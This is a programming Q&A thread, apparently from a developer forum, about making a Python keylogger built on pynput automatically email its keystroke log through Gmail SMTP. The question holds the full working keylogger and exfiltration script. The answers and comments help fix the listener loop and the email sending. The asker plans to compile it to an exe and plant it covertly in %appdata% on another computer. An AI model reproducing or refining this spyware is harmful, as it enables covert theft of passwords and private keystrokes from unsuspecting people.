# How to make python send an email automatically

Tags: python, email, keylogger

I am trying to make a simple keylogger in python (for legal penetration testing purposes) and I am having trouble getting the script to automatically send me an email.

if I put the email code after my keylogger it wont send me the txt file I think this is because of the keylogger script constantly repeating itself and not acknowledging my email script how can I fix this?

here is the script:

```
    from pynput.keyboard import Key, Listener
import smtplib
import logging
import smtplib

log_dir = ""

logging.basicConfig(filename=(log_dir + "yourtext.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders

email_user = 'EMAIL'
email_password = 'PASSWORD'
email_send = 'EMAIL'

subject = 'logger'

msg = MIMEMultipart()
msg['From'] = email_user
msg['To'] = email_send
msg['Subject'] = subject

body = 'your text'
msg.attach(MIMEText(body,'plain'))

filename='yourtext.txt'
attachment  =open(filename,'rb')

part = MIMEBase('application','octet-stream')
part.set_payload((attachment).read())
encoders.encode_base64(part)
part.add_header('Content-Disposition',"attachment; filename= "+filename)

msg.attach(part)
text = msg.as_string()
server = smtplib.SMTP('smtp.gmail.com',587)
server.starttls()
server.login('EMAIL','PASSWORD')


server.sendmail(email_user,email_send,text)
server.quit()
```

Comment: I imagine you're stuck in a loop here: `with Listener(on_press=on_press) as listener:
    listener.join()`?

Comment: It's probably a better idea to separate your logger and email service.  Keep your logger running and then schedule your email service via `cron` (or scheduled tasks on Windows) to email on a set interval.

Comment: @Idlehands thank you I scheduled the email script using time.sleep(x) but I will consider your suggestion

Comment: That's not what I meant by scheduling.  I meant save your email service as a separate script and use your OS's task scheduler to run `email.py` at an interval.  You *could* keep `email.py` running with a `time.sleep()` delay but if an error occurs the task won't restart at the next interval, because the script had already crashed.

Comment: @idlehands thank you for specifying but I'm looking to compile this script into an exe and making it plug and play with as little configuring as possible. Let's say im putting the keylogger on another computer I can just go into the %appdata% directory put the file in, and run it. I don't want to waste time downloading a whole other program and wasting even more time keeping Cron hidden.

Answer (score 0, accepted):

So first of all you haven't added any break whenever your listener call starts so your program gets stuck into that loop and has no criteria to come out.

Try adding a break point in below code

```
with Listener(on_press=on_press) as listener:
listener.join()
```

You can add specific character as a break point or certain lines as break point.

Trying using the Gmail API if your mail sending code doesn't work out.
[Gmail API Docs](https://developers.google.com/gmail/api/guides/sending)

Modify your file according to below code:

```
def on_press(key):
    logging.info(str(key))

def on_release(key):
    logging.info('{0} release'.format(key))
    if key == Key.caps_lock:
        return False

with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
```

You can find more information relating to above code [here](https://pythonhosted.org/pynput/keyboard.html)

If you are unable to receive mails it may be because you have not enabled POP/IMAP. Follow below steps:

1. Sign into your Gmail Account
2. Go on to settings and click Forwarding and POP/IMAP section.
3. Enable IMAP in IMAP Access Section.

Comment: hello I added a break point like so `with Listener(on_press=on_press) as listener:
    pdb.set_trace()
    listener.join() ` and it gives me this in the terminal `C:\Users\drossosa\Desktop\keylogger>py "C:\Users\drossosa\Desktop\keylogger\logger test 1.py"
> c:\users\drossosa\desktop\keylogger\logger test 1.py(17)<module>()
-> listener.join()
(Pdb)` and it lets me type in commands what does this mean? and how can it help?

Comment: I added the modified code to the script but I still dont get an email and it also and it just tells me that the key is released which isn't really needed.

Comment: You can remove the logging part from on_release function if you don't want to print release keys.
Moreover if you are not receiving mail it may be because you have not enabled POP/IMAP ( which you can enable in settings of your gmail.)

Comment: I tested the email script alone without the key-logger and it sends the text file fine so my email is not the problem

Comment: @AlexanderDrossos if you think the solution answered your question pls mark it resolved so that others could use it. Thanks!